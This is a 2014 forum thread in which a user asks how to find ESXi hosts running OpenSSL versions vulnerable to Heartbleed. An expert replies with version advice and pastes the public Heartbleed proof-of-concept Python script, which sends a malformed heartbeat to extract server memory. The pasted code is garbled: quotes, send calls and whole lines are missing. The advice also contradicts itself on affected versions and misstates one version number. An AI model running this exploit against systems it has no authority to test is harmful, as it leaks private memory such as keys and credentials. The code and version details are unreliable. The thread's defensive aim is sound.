A Script to Determine OpenSSL version on ESXi Host

Posted on 2014-04-09
Last Modified: 2014-04-16
I need to write a script that basically run thru each ESX host and determine what version of OpenSSL is running and report back which, if any, are vulnerable.

OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable

Those any such script that is similar already exist?


Question by:lipotech
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 7
  • 5
LVL 121
ID: 39990321
see this thread, will answer your question, you just need to check VMware ESXi BUILDs

a test script is included...

prior to ESXi 5.5 should be unaffected.

VMware response...

Author Comment

ID: 39998893

Sorry for the delayed response.  I have been involved in other support activities over the weekend.  I followed the thread as you recommended.  I reviewed the script and I have a series of questions:

1.  Is this a PowerCli?
2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.
3. Would the script be saved as a text file and launched from within PowerShell from the command line?

That you for your support.

LVL 121
ID: 39998914
1.  Is this a PowerCli?


It's not PowerCLI.

Are all your hosts 5.5, if they are 5.5, they have the issue.

If they are lower than 5.1, they do not have this issue.

It's that simple, the details in the forum, are a simple openssl.exe connection call.

2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.

It's run from the command prompt, in the Openssl folder, against the IP Address, of a suspect system (vCenter Server or Host)

3. Would the script be saved as a text file and launched from within PowerShell from the command line?

It's not a script, it's just a command line function.

Personally, I would not waste your time, check your Host versions > 5.1 you have the threat, and you will need to wait for the VMware patch.

< 5.1 no threat exists!
Migrating Your Company's PCs

To keep pace with competitors, businesses must keep employees productive, and that means providing them with the latest technology. This document provides the tips and tricks you need to help you migrate an outdated PC fleet to new desktops, laptops, and tablets.

LVL 121
ID: 39999136
if you really want a script, here is a python script

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01

hb = h2bin('''
18 03 02 00 03
01 40 00

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ' %04x: %-48s %s' % (b, hxdat, pdat)

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e =[s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    print 'Waiting for Server Hello...'
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:

    print 'Sending heartbeat request...'

if __name__ == '__main__':


Open in new window


Author Comment

ID: 39999225

Thank you.  I or two more final questions.  Is the Pytjon script luanched fromt the ESX host OpenSSl folders as well?  Can I launch the script as is by saving it to a text file?  What extention would I use on the file?  Do I point this file at the IP address as well?

LVL 121
ID: 39999339
You will need to use the Python script on any computer which has Python installed, this is NOT ESXi!

OpenSSL is not required, just Python.

Save the above to a file called <> execute permissions, and run from Linux or Windows.

you type

./ <IP Address?

it will return:-

WARNING: server returned more data than it should - server is vulnerable!

Author Comment

ID: 40003896

I can install Python and use this script.  I would prefer to run a PowerCLI script in this environment.  If there is PowerCLI script that exist, please let me know.  

Otherwise, thank you for providing a complete response to my question.

LVL 121

Accepted Solution

Andrew Hancock (VMware vExpert / EE MVE^2) earned 500 total points
ID: 40003942
I've not seen a PowerCLI script at present.

Wait until 19th April 2014, there will be a patch and update released!

You could use PowerCLI to run the following command...

~ # openssl version
OpenSSL 1.0.1e 11 Feb 2013
~ # vmware --version
VMware ESXi 5.5.0 build-1623387

if version = 1.1.0e you have the bug, it's not a test, but only ESXi 5.5 has the issue!

Author Comment

ID: 40004141
Thank you.
LVL 121
ID: 40004160
no problems

Author Comment

ID: 40004193
If you know of any PowerCli scripts of any type that would be easy follow and test, it would be appreciated.  I am in the process of trying to become more proficient with the PowerCLI scripting language.
LVL 121
ID: 40004281
See my response to your recent posting.

Featured Post

Get 15 Days FREE Full-Featured Trial

Benefit from a mission critical IT monitoring with Monitis Premium or get it FREE for your entry level monitoring needs.
-Over 200,000 users
-More than 300,000 websites monitored
-Used in 197 countries
-Recommended by 98% of users

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

If your vDisk VHD file gets deleted from the image store accidentally or on purpose, you won't be able to remove the vDisk from the PVS console. There is a known workaround that is solid.
In this post we will learn how to make Android Gesture Tutorial and give different functionality whenever a user Touch or Scroll android screen.
Viewers will learn how to properly install Eclipse with the necessary JDK, and will take a look at an introductory Java program. Download Eclipse installation zip file: Extract files from zip file: Download and install JDK 8: Open Eclipse and …
This video shows you how to use a vSphere client to connect to your ESX host as the root user. Demonstrates the basic connection of bypassing certification set up. Demonstrates how to access the traditional view to begin managing your virtual mac…

628 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question